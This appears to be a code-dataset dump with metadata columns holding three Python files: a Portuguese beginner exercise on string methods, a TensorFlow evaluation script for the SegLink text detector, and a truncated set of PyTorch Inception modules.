| de | 0.265769 | # SPDX-License-Identifier: MIT # Copyright (C) 2019-2022 <NAME> | 1.640701 | 2 |
Desafios/Mundo 1/ex004.py | ZaikoXander/Python | 0 | 6612368 | from time import sleep
data = input('\033[1;30;107mDigite algo:\033[m ')
print('\033[1;35;107mIDENTIFICANDO PROPRIEDADES...\033[m')
sleep(3)
print('\n\033[1;30;107mÉ string.\033[m')
if data.isnumeric():
print('\033[1;30;107mÉ numérico.\033[m')
if data.isalpha():
print('\033[1;30;107mÉ alfabético.\033[m')
if data.isalnum():
print('\033[1;30;107mÉ alfanumérico.\033[m')
if data.isdigit():
print('\033[1;30;107mÉ dígito.\033[m')
if data.isdecimal():
print('\033[1;30;107mÉ decimal.\033[m')
if data.islower():
print('\033[1;30;107mÉ minúsculo.\033[m')
if data.isspace():
print('\033[1;30;107mSó tem espaços.\033[m')
if data.isupper():
print('\033[1;30;107mÉ maiúsculo.\033[m')
if data.istitle():
print('\033[1;30;107mÉ capitalizado.\033[m')
| from time import sleep
data = input('\033[1;30;107mDigite algo:\033[m ')
print('\033[1;35;107mIDENTIFICANDO PROPRIEDADES...\033[m')
sleep(3)
print('\n\033[1;30;107mÉ string.\033[m')
if data.isnumeric():
print('\033[1;30;107mÉ numérico.\033[m')
if data.isalpha():
print('\033[1;30;107mÉ alfabético.\033[m')
if data.isalnum():
print('\033[1;30;107mÉ alfanumérico.\033[m')
if data.isdigit():
print('\033[1;30;107mÉ dígito.\033[m')
if data.isdecimal():
print('\033[1;30;107mÉ decimal.\033[m')
if data.islower():
print('\033[1;30;107mÉ minúsculo.\033[m')
if data.isspace():
print('\033[1;30;107mSó tem espaços.\033[m')
if data.isupper():
print('\033[1;30;107mÉ maiúsculo.\033[m')
if data.istitle():
print('\033[1;30;107mÉ capitalizado.\033[m')
| none | 1 | 3.506707 | 4 | |
macro_benchmark/SegLink/seglink/evaluate.py | songhappy/ai-matrix | 180 | 6612369 | <gh_stars>100-1000
import os, sys, math, time, logging, random
import tensorflow as tf
import numpy as np
import visualizations
import matplotlib as mpl
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import joblib
import model
import data
import utils
import ops
FLAGS = tf.app.flags.FLAGS
# logging
try:
tf.app.flags.DEFINE_string('log_dir', '', 'Directory for saving checkpoints and log files')
except:
print("log_dir has been defined before!")
try:
tf.app.flags.DEFINE_string('log_prefix', '', 'Log file name prefix')
except:
print("log_prefix has been defined before!")
# testing
tf.app.flags.DEFINE_string('image_resize_method', 'fixed', 'Image resizing method. "fixed" or "dynamic"')
tf.app.flags.DEFINE_string('test_model', '', 'Checkpoint for testing')
tf.app.flags.DEFINE_string('test_dataset', '', 'Test dataset path')
tf.app.flags.DEFINE_integer('test_batch_size', 32, 'Test batch size')
tf.app.flags.DEFINE_integer('num_test', 500, 'Number of test images')
tf.app.flags.DEFINE_float('node_threshold', 0.5, 'Confidence threshold for nodes')
tf.app.flags.DEFINE_float('link_threshold', 0.5, 'Confidence threshold for links')
tf.app.flags.DEFINE_integer('save_vis', 0, 'Save visualization results')
tf.app.flags.DEFINE_string('vis_save_dir', '', 'Visualization save directory')
tf.app.flags.DEFINE_string('result_format', 'icdar_2015_inc', 'Result file format')
tf.app.flags.DEFINE_string('result_suffix', time.strftime('_%Y%m%d_%H%M%S'), 'Result file suffix')
# post processing
tf.app.flags.DEFINE_float('bbox_scale', 1.0, 'Scale output bounding box')
tf.app.flags.DEFINE_float('bbox_min_area', 0, 'Minimum bounding box area')
# intermediate results
tf.app.flags.DEFINE_integer('load_intermediate', 0, 'Whether to load intermediate results.')
tf.app.flags.DEFINE_integer('save_intermediate', 0, 'Whether to load intermediate results.')
# useless flags, do not set
try:
tf.app.flags.DEFINE_string('weight_init_method', 'xavier', 'Weight initialization method')
except:
print("weight_init_method has been defined before!")
def evaluate():
with tf.device('/cpu:0'):
# input data
streams = data.input_stream(FLAGS.test_dataset)
pstreams = data.test_preprocess(streams)
if FLAGS.test_resize_method == 'dynamic':
# each test image is resized to a different size
# test batch size must be 1
assert(FLAGS.test_batch_size == 1)
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1,
dynamic_pad=True)
else:
# resize every image to the same size
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1)
image_size = tf.shape(batches['image'])[1:3]
fetches = {}
fetches['images'] = batches['image']
fetches['image_name'] = batches['image_name']
fetches['resize_size'] = batches['resize_size']
fetches['orig_size'] = batches['orig_size']
# detector
detector = model.SegLinkDetector()
all_maps = detector.build_model(batches['image'])
# decode local predictions
all_nodes, all_links, all_reg = [], [], []
for i, maps in enumerate(all_maps):
cls_maps, lnk_maps, reg_maps = maps
reg_maps = tf.multiply(reg_maps, data.OFFSET_VARIANCE)
# segments classification
cls_prob = tf.nn.softmax(tf.reshape(cls_maps, [-1, 2]))
cls_pos_prob = cls_prob[:, model.POS_LABEL]
cls_pos_prob_maps = tf.reshape(cls_pos_prob, tf.shape(cls_maps)[:3])
# node status is 1 where probability is higher than threshold
node_labels = tf.cast(tf.greater_equal(cls_pos_prob_maps, FLAGS.node_threshold),
tf.int32)
# link classification
lnk_prob = tf.nn.softmax(tf.reshape(lnk_maps, [-1, 2]))
lnk_pos_prob = lnk_prob[:, model.POS_LABEL]
lnk_shape = tf.shape(lnk_maps)
lnk_pos_prob_maps = tf.reshape(lnk_pos_prob,
[lnk_shape[0], lnk_shape[1], lnk_shape[2], -1])
# link status is 1 where probability is higher than threshold
link_labels = tf.cast(tf.greater_equal(lnk_pos_prob_maps, FLAGS.link_threshold),
tf.int32)
all_nodes.append(node_labels)
all_links.append(link_labels)
all_reg.append(reg_maps)
fetches['link_labels_%d' % i] = link_labels
# decode segments and links
segments, group_indices, segment_counts = ops.decode_segments_links(
image_size, all_nodes, all_links, all_reg,
anchor_sizes=list(detector.anchor_sizes))
fetches['segments'] = segments
fetches['group_indices'] = group_indices
fetches['segment_counts'] = segment_counts
# combine segments
combined_rboxes, combined_counts = ops.combine_segments(
segments, group_indices, segment_counts)
fetches['combined_rboxes'] = combined_rboxes
fetches['combined_counts'] = combined_counts
sess_config = tf.ConfigProto()
with tf.Session(config=sess_config) as sess:
# load model
model_loader = tf.train.Saver()
model_loader.restore(sess, FLAGS.test_model)
batch_size = FLAGS.test_batch_size
n_batches = int(math.ceil(FLAGS.num_test / batch_size))
# result directory
result_dir = os.path.join(FLAGS.log_dir, 'results' + FLAGS.result_suffix)
utils.mkdir_if_not_exist(result_dir)
intermediate_result_path = os.path.join(FLAGS.log_dir, 'intermediate.pkl')
if FLAGS.load_intermediate:
all_batches = joblib.load(intermediate_result_path)
logging.info('Intermediate result loaded from {}'.format(intermediate_result_path))
else:
# run all batches and store results in a list
all_batches = []
with slim.queues.QueueRunners(sess):
for i in range(n_batches):
if i % 10 == 0:
logging.info('Evaluating batch %d/%d' % (i+1, n_batches))
sess_outputs = sess.run(fetches)
all_batches.append(sess_outputs)
if FLAGS.save_intermediate:
joblib.dump(all_batches, intermediate_result_path, compress=5)
logging.info('Intermediate result saved to {}'.format(intermediate_result_path))
# # visualize local rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'localpred_batch_%d_' % i)
# pred_rboxes_counts = []
# for j in range(len(all_maps)):
# pred_rboxes_counts.append((sess_outputs['segments_det_%d' % j],
# sess_outputs['segment_counts_det_%d' % j]))
# _visualize_layer_det(sess_outputs['images'],
# pred_rboxes_counts,
# vis_save_prefix)
# # visualize joined rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'batch_%d_' % i)
# # _visualize_linked_det(sess_outputs, save_prefix)
# _visualize_combined_rboxes(sess_outputs, vis_save_prefix)
if FLAGS.result_format == 'icdar_2015_inc':
postprocess_and_write_results_ic15(all_batches, result_dir)
elif FLAGS.result_format == 'icdar_2013':
postprocess_and_write_results_ic13(all_batches, result_dir)
else:
logging.critical('Unknown result format: {}'.format(FLAGS.result_format))
sys.exit(1)
logging.info('Evaluation done.')
def postprocess_and_write_results_ic15(all_batches, result_dir):
test_count = 0
for batch in all_batches:
for i in range(FLAGS.test_batch_size):
# the last batch may contain duplicates
if test_count > FLAGS.num_test: break
rboxes = batch['combined_rboxes'][i]
count = batch['combined_counts'][i]
rboxes = rboxes[:count, :]
# post processings
if FLAGS.bbox_scale > 1.0:
rboxes[:, 3:5] *= FLAGS.bbox_scale
# convert rboxes to polygons and find its coordinates on the original image
orig_h, orig_w = batch['orig_size'][i]
resize_h, resize_w = batch['resize_size'][i]
polygons = utils.rboxes_to_polygons(rboxes)
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
# confine polygons inside image
polygons[:, ::2] = np.maximum(0, np.minimum(polygons[:, ::2] * scale_x, orig_w-1))
polygons[:, 1::2] = np.maximum(0, np.minimum(polygons[:, 1::2] * scale_y, orig_h-1))
polygons = np.round(polygons).astype(np.int32)
# write results to text files
image_name = batch['image_name'][i].decode('ascii')
result_fname = 'res_{}.txt'.format(os.path.splitext(image_name)[0])
orig_size = batch['orig_size'][i]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(polygons.shape[0]):
poly_str = list(polygons[k])
poly_str = [str(o) for o in poly_str]
poly_str = ','.join(poly_str)
lines.append(poly_str)
# remove duplicated lines
lines = list(frozenset(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
test_count += 1
# compress results into a single zip file
result_dir_name = 'results' + FLAGS.result_suffix
cmd = "zip -rj {}.zip {}".format(os.path.join(result_dir, '..', result_dir_name),
result_dir)
logging.info('Executing {}'.format(cmd))
os.system(cmd)
def postprocess_and_write_results_ic13(all_results):
raise NotImplementedError('This function needs revision')
for j in range(batch_size):
# convert detection results
rboxes = sess_outputs['combined_rboxes'][j]
count = sess_outputs['combined_counts'][j]
orig_h, orig_w = sess_outputs['orig_size'][j]
resize_h, resize_w = sess_outputs['resize_size'][j]
bboxes = utils.rboxes_to_bboxes(rboxes[:count, :])
# bbox scaling trick
bbox_scale = FLAGS.bbox_scale
bboxes_width = bboxes[:,2] - bboxes[:,0]
bboxes_height = bboxes[:,3] - bboxes[:,1]
bboxes[:,0] -= 0.5 * bbox_scale * bboxes_width
bboxes[:,1] -= 0.5 * bbox_scale * bboxes_height
bboxes[:,2] += 0.5 * bbox_scale * bboxes_width
bboxes[:,3] += 0.5 * bbox_scale * bboxes_height
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
bboxes[:, ::2] = np.maximum(0, np.minimum(bboxes[:, ::2] * scale_x, orig_w-1))
bboxes[:, 1::2] = np.maximum(0, np.minimum(bboxes[:, 1::2] * scale_y, orig_h-1))
bboxes = np.round(bboxes).astype(np.int32)
# write results to text files
image_name = str(sess_outputs['image_name'][j])
result_fname = 'res_' + os.path.splitext(image_name)[0] + '.txt'
orig_size = sess_outputs['orig_size'][j]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(bboxes.shape[0]):
bbox_str = list(bboxes[k])
bbox_str = [str(o) for o in bbox_str]
bbox_str = ','.join(bbox_str)
lines.append(bbox_str)
# remove duplicated lines
lines = list(set(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
# save images and lexicon list for post-processing
if FLAGS.save_image_and_lexicon:
sess_outputs['']
if __name__ == '__main__':
# create logging dir if not existed
utils.mkdir_if_not_exist(FLAGS.log_dir)
# set up logging
log_file_name = FLAGS.log_prefix + time.strftime('%Y%m%d_%H%M%S') + '.log'
log_file_path = os.path.join(FLAGS.log_dir, log_file_name)
utils.setup_logger(log_file_path)
utils.log_flags(FLAGS)
#utils.log_git_version()
# run test
evaluate()
| import os, sys, math, time, logging, random
import tensorflow as tf
import numpy as np
import visualizations
import matplotlib as mpl
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import joblib
import model
import data
import utils
import ops
FLAGS = tf.app.flags.FLAGS
# logging
try:
tf.app.flags.DEFINE_string('log_dir', '', 'Directory for saving checkpoints and log files')
except:
print("log_dir has been defined before!")
try:
tf.app.flags.DEFINE_string('log_prefix', '', 'Log file name prefix')
except:
print("log_prefix has been defined before!")
# testing
tf.app.flags.DEFINE_string('image_resize_method', 'fixed', 'Image resizing method. "fixed" or "dynamic"')
tf.app.flags.DEFINE_string('test_model', '', 'Checkpoint for testing')
tf.app.flags.DEFINE_string('test_dataset', '', 'Test dataset path')
tf.app.flags.DEFINE_integer('test_batch_size', 32, 'Test batch size')
tf.app.flags.DEFINE_integer('num_test', 500, 'Number of test images')
tf.app.flags.DEFINE_float('node_threshold', 0.5, 'Confidence threshold for nodes')
tf.app.flags.DEFINE_float('link_threshold', 0.5, 'Confidence threshold for links')
tf.app.flags.DEFINE_integer('save_vis', 0, 'Save visualization results')
tf.app.flags.DEFINE_string('vis_save_dir', '', 'Visualization save directory')
tf.app.flags.DEFINE_string('result_format', 'icdar_2015_inc', 'Result file format')
tf.app.flags.DEFINE_string('result_suffix', time.strftime('_%Y%m%d_%H%M%S'), 'Result file suffix')
# post processing
tf.app.flags.DEFINE_float('bbox_scale', 1.0, 'Scale output bounding box')
tf.app.flags.DEFINE_float('bbox_min_area', 0, 'Minimum bounding box area')
# intermediate results
tf.app.flags.DEFINE_integer('load_intermediate', 0, 'Whether to load intermediate results.')
tf.app.flags.DEFINE_integer('save_intermediate', 0, 'Whether to load intermediate results.')
# useless flags, do not set
try:
tf.app.flags.DEFINE_string('weight_init_method', 'xavier', 'Weight initialization method')
except:
print("weight_init_method has been defined before!")
def evaluate():
with tf.device('/cpu:0'):
# input data
streams = data.input_stream(FLAGS.test_dataset)
pstreams = data.test_preprocess(streams)
if FLAGS.test_resize_method == 'dynamic':
# each test image is resized to a different size
# test batch size must be 1
assert(FLAGS.test_batch_size == 1)
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1,
dynamic_pad=True)
else:
# resize every image to the same size
batches = tf.train.batch(pstreams,
FLAGS.test_batch_size,
capacity=1000,
num_threads=1)
image_size = tf.shape(batches['image'])[1:3]
fetches = {}
fetches['images'] = batches['image']
fetches['image_name'] = batches['image_name']
fetches['resize_size'] = batches['resize_size']
fetches['orig_size'] = batches['orig_size']
# detector
detector = model.SegLinkDetector()
all_maps = detector.build_model(batches['image'])
# decode local predictions
all_nodes, all_links, all_reg = [], [], []
for i, maps in enumerate(all_maps):
cls_maps, lnk_maps, reg_maps = maps
reg_maps = tf.multiply(reg_maps, data.OFFSET_VARIANCE)
# segments classification
cls_prob = tf.nn.softmax(tf.reshape(cls_maps, [-1, 2]))
cls_pos_prob = cls_prob[:, model.POS_LABEL]
cls_pos_prob_maps = tf.reshape(cls_pos_prob, tf.shape(cls_maps)[:3])
# node status is 1 where probability is higher than threshold
node_labels = tf.cast(tf.greater_equal(cls_pos_prob_maps, FLAGS.node_threshold),
tf.int32)
# link classification
lnk_prob = tf.nn.softmax(tf.reshape(lnk_maps, [-1, 2]))
lnk_pos_prob = lnk_prob[:, model.POS_LABEL]
lnk_shape = tf.shape(lnk_maps)
lnk_pos_prob_maps = tf.reshape(lnk_pos_prob,
[lnk_shape[0], lnk_shape[1], lnk_shape[2], -1])
# link status is 1 where probability is higher than threshold
link_labels = tf.cast(tf.greater_equal(lnk_pos_prob_maps, FLAGS.link_threshold),
tf.int32)
all_nodes.append(node_labels)
all_links.append(link_labels)
all_reg.append(reg_maps)
fetches['link_labels_%d' % i] = link_labels
# decode segments and links
segments, group_indices, segment_counts = ops.decode_segments_links(
image_size, all_nodes, all_links, all_reg,
anchor_sizes=list(detector.anchor_sizes))
fetches['segments'] = segments
fetches['group_indices'] = group_indices
fetches['segment_counts'] = segment_counts
# combine segments
combined_rboxes, combined_counts = ops.combine_segments(
segments, group_indices, segment_counts)
fetches['combined_rboxes'] = combined_rboxes
fetches['combined_counts'] = combined_counts
sess_config = tf.ConfigProto()
with tf.Session(config=sess_config) as sess:
# load model
model_loader = tf.train.Saver()
model_loader.restore(sess, FLAGS.test_model)
batch_size = FLAGS.test_batch_size
n_batches = int(math.ceil(FLAGS.num_test / batch_size))
# result directory
result_dir = os.path.join(FLAGS.log_dir, 'results' + FLAGS.result_suffix)
utils.mkdir_if_not_exist(result_dir)
intermediate_result_path = os.path.join(FLAGS.log_dir, 'intermediate.pkl')
if FLAGS.load_intermediate:
all_batches = joblib.load(intermediate_result_path)
logging.info('Intermediate result loaded from {}'.format(intermediate_result_path))
else:
# run all batches and store results in a list
all_batches = []
with slim.queues.QueueRunners(sess):
for i in range(n_batches):
if i % 10 == 0:
logging.info('Evaluating batch %d/%d' % (i+1, n_batches))
sess_outputs = sess.run(fetches)
all_batches.append(sess_outputs)
if FLAGS.save_intermediate:
joblib.dump(all_batches, intermediate_result_path, compress=5)
logging.info('Intermediate result saved to {}'.format(intermediate_result_path))
# # visualize local rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'localpred_batch_%d_' % i)
# pred_rboxes_counts = []
# for j in range(len(all_maps)):
# pred_rboxes_counts.append((sess_outputs['segments_det_%d' % j],
# sess_outputs['segment_counts_det_%d' % j]))
# _visualize_layer_det(sess_outputs['images'],
# pred_rboxes_counts,
# vis_save_prefix)
# # visualize joined rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'batch_%d_' % i)
# # _visualize_linked_det(sess_outputs, save_prefix)
# _visualize_combined_rboxes(sess_outputs, vis_save_prefix)
if FLAGS.result_format == 'icdar_2015_inc':
postprocess_and_write_results_ic15(all_batches, result_dir)
elif FLAGS.result_format == 'icdar_2013':
postprocess_and_write_results_ic13(all_batches, result_dir)
else:
logging.critical('Unknown result format: {}'.format(FLAGS.result_format))
sys.exit(1)
logging.info('Evaluation done.')
def postprocess_and_write_results_ic15(all_batches, result_dir):
test_count = 0
for batch in all_batches:
for i in range(FLAGS.test_batch_size):
# the last batch may contain duplicates
if test_count > FLAGS.num_test: break
rboxes = batch['combined_rboxes'][i]
count = batch['combined_counts'][i]
rboxes = rboxes[:count, :]
# post processings
if FLAGS.bbox_scale > 1.0:
rboxes[:, 3:5] *= FLAGS.bbox_scale
# convert rboxes to polygons and find its coordinates on the original image
orig_h, orig_w = batch['orig_size'][i]
resize_h, resize_w = batch['resize_size'][i]
polygons = utils.rboxes_to_polygons(rboxes)
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
# confine polygons inside image
polygons[:, ::2] = np.maximum(0, np.minimum(polygons[:, ::2] * scale_x, orig_w-1))
polygons[:, 1::2] = np.maximum(0, np.minimum(polygons[:, 1::2] * scale_y, orig_h-1))
polygons = np.round(polygons).astype(np.int32)
# write results to text files
image_name = batch['image_name'][i].decode('ascii')
result_fname = 'res_{}.txt'.format(os.path.splitext(image_name)[0])
orig_size = batch['orig_size'][i]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(polygons.shape[0]):
poly_str = list(polygons[k])
poly_str = [str(o) for o in poly_str]
poly_str = ','.join(poly_str)
lines.append(poly_str)
# remove duplicated lines
lines = list(frozenset(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
test_count += 1
# compress results into a single zip file
result_dir_name = 'results' + FLAGS.result_suffix
cmd = "zip -rj {}.zip {}".format(os.path.join(result_dir, '..', result_dir_name),
result_dir)
logging.info('Executing {}'.format(cmd))
os.system(cmd)
def postprocess_and_write_results_ic13(all_results):
raise NotImplementedError('This function needs revision')
for j in range(batch_size):
# convert detection results
rboxes = sess_outputs['combined_rboxes'][j]
count = sess_outputs['combined_counts'][j]
orig_h, orig_w = sess_outputs['orig_size'][j]
resize_h, resize_w = sess_outputs['resize_size'][j]
bboxes = utils.rboxes_to_bboxes(rboxes[:count, :])
# bbox scaling trick
bbox_scale = FLAGS.bbox_scale
bboxes_width = bboxes[:,2] - bboxes[:,0]
bboxes_height = bboxes[:,3] - bboxes[:,1]
bboxes[:,0] -= 0.5 * bbox_scale * bboxes_width
bboxes[:,1] -= 0.5 * bbox_scale * bboxes_height
bboxes[:,2] += 0.5 * bbox_scale * bboxes_width
bboxes[:,3] += 0.5 * bbox_scale * bboxes_height
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
bboxes[:, ::2] = np.maximum(0, np.minimum(bboxes[:, ::2] * scale_x, orig_w-1))
bboxes[:, 1::2] = np.maximum(0, np.minimum(bboxes[:, 1::2] * scale_y, orig_h-1))
bboxes = np.round(bboxes).astype(np.int32)
# write results to text files
image_name = str(sess_outputs['image_name'][j])
result_fname = 'res_' + os.path.splitext(image_name)[0] + '.txt'
orig_size = sess_outputs['orig_size'][j]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(bboxes.shape[0]):
bbox_str = list(bboxes[k])
bbox_str = [str(o) for o in bbox_str]
bbox_str = ','.join(bbox_str)
lines.append(bbox_str)
# remove duplicated lines
lines = list(set(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
# save images and lexicon list for post-processing
if FLAGS.save_image_and_lexicon:
sess_outputs['']
if __name__ == '__main__':
# create logging dir if not existed
utils.mkdir_if_not_exist(FLAGS.log_dir)
# set up logging
log_file_name = FLAGS.log_prefix + time.strftime('%Y%m%d_%H%M%S') + '.log'
log_file_path = os.path.join(FLAGS.log_dir, log_file_name)
utils.setup_logger(log_file_path)
utils.log_flags(FLAGS)
#utils.log_git_version()
# run test
evaluate() | en | 0.575495 | # logging # testing # post processing # intermediate results # useless flags, do not set # input data # each test image is resized to a different size # test batch size must be 1 # resize every image to the same size # detector # decode local predictions # segments classification # node status is 1 where probability is higher than threshold # link classification # link status is 1 where probability is higher than threshold # decode segments and links # combine segments # load model # result directory # run all batches and store results in a list # # visualize local rboxes (TODO) # if FLAGS.save_vis: # vis_save_prefix = os.path.join(save_dir, 'localpred_batch_%d_' % i) # pred_rboxes_counts = [] # for j in range(len(all_maps)): # pred_rboxes_counts.append((sess_outputs['segments_det_%d' % j], # sess_outputs['segment_counts_det_%d' % j])) # _visualize_layer_det(sess_outputs['images'], # pred_rboxes_counts, # vis_save_prefix) # # visualize joined rboxes (TODO) # if FLAGS.save_vis: # vis_save_prefix = os.path.join(save_dir, 'batch_%d_' % i) # # _visualize_linked_det(sess_outputs, save_prefix) # _visualize_combined_rboxes(sess_outputs, vis_save_prefix) # the last batch may contain duplicates # post processings # convert rboxes to polygons and find its coordinates on the original image # confine polygons inside image # write results to text files # remove duplicated lines #logging.info('Detection results written to {}'.format(save_path)) # compress results into a single zip file # convert detection results # bbox scaling trick # write results to text files # remove duplicated lines #logging.info('Detection results written to {}'.format(save_path)) # save images and lexicon list for post-processing # create logging dir if not existed # set up logging #utils.log_git_version() # run test | 2.004411 | 2 |
Chapter4/ex_4_15.py | zxjzxj9/PyTorchIntroduction | 205 | 6612370 | <filename>Chapter4/ex_4_15.py<gh_stars>100-1000
""" 本代码可以被其它代码导入,作为模型的一部分
"""
# InceptionA 模块
class InceptionA(nn.Module):
def __init__(self, in_channels, pool_features):
super(InceptionA, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch5x5_1 = BasicConv2d(in_channels, 48, kernel_size=1)
self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)
self.branch_pool = BasicConv2d(in_channels, pool_features,
kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionB 模块
class InceptionB(nn.Module):
def __init__(self, in_channels):
super(InceptionB, self).__init__()
self.branch3x3 = BasicConv2d(in_channels, 384, kernel_size=3,
stride=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionC 模块
class InceptionC(nn.Module):
def __init__(self, in_channels, channels_7x7):
super(InceptionC, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 192, kernel_size=1)
c7 = channels_7x7
self.branch7x7_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7dbl_2 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_3 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7dbl_4 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_5 = BasicConv2d(c7, 192, kernel_size=(1, 7),
padding=(0, 3))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionD 模块
class InceptionD(nn.Module):
def __init__(self, in_channels):
super(InceptionD, self).__init__()
self.branch3x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)
self.branch7x7x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch7x7x3_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7x3_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7x3_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch7x7x3, branch_pool]
return torch.cat(outputs, 1)
# InceptionE 模块
class InceptionE(nn.Module):
def __init__(self, in_channels):
super(InceptionE, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 320, kernel_size=1)
self.branch3x3_1 = BasicConv2d(in_channels, 384, kernel_size=1)
self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch3x3dbl_1 = BasicConv2d(in_channels, 448, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)
self.branch3x3dbl_3a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3dbl_3b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3 = self.branch3x3_1(x)
branch3x3 = [
self.branch3x3_2a(branch3x3),
self.branch3x3_2b(branch3x3),
]
branch3x3 = torch.cat(branch3x3, 1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = [
self.branch3x3dbl_3a(branch3x3dbl),
self.branch3x3dbl_3b(branch3x3dbl),
]
branch3x3dbl = torch.cat(branch3x3dbl, 1)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionAux 模块
class InceptionAux(nn.Module):
def __init__(self, in_channels, num_classes):
super(InceptionAux, self).__init__()
self.conv0 = BasicConv2d(in_channels, 128, kernel_size=1)
self.conv1 = BasicConv2d(128, 768, kernel_size=5)
